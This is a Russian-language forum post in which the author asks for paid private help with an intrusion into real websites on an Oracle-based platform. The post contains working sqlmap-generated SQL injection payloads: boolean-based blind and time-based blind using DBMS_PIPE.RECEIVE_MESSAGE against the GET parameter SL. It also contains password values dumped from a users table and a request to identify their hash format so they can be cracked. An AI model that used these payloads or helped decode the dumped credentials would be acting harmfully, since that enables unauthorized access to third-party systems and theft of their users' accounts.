Кто-нибудь может в личке помочь и глянуть один сайт? DB Oracle язвимость

Place: GET

Parameter: SL

Type: boolean-based blind

Title: Oracle boolean-based blind - GROUP BY and ORDER BY clauses

Payload: ...&SL=54,(SELECT (CASE WHEN (7590=7590) THEN 54 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Type: AND/OR time-based blind

Title: Oracle time-based blind - GROUP BY and ORDER BY clauses (DBMS_PIPE.RECEIVE_MESSAGE)

Payload: ....&SL=54,(SELECT (CASE WHEN (9646=9646) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(101)||CHR(9 7)||CHR(117),5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)

Всё выдётся отлично, вывод хороший, стабильный. Но вместо хеша или пароля в табличке юзоров выдаётся какая-то символьная фигня типа:

\x1c\x1f\x17\x18\x0ev\x1fjt\x15}

Притом это не на одном сайте, а на всех сайтах этой платформы.

Кто имеет время глянуть, напишите в личку, я скину урл. Очень важные для меня сайты на этой полатформе, я бьюсь в отчаянии, не знаю что делать. ПОМОГИТЕ!!!!!!

UPDATE: прогнала SQLMAP с режимом --binary-fields=PASSWORD, похоже, что пароли хранятся в бинарном виде. Выдаёт следующее:

157E02680F7F

1B0C130E197B620B7316

131E091001

171E0A0B057F620C7E12

00051D00087D6B087F17

171D1C0D0B676A08711D

0A00011F0A076F0F07600B0A

Что это за хеши такие? Oracle(DES)? или...? есть идеи?

PS можно платно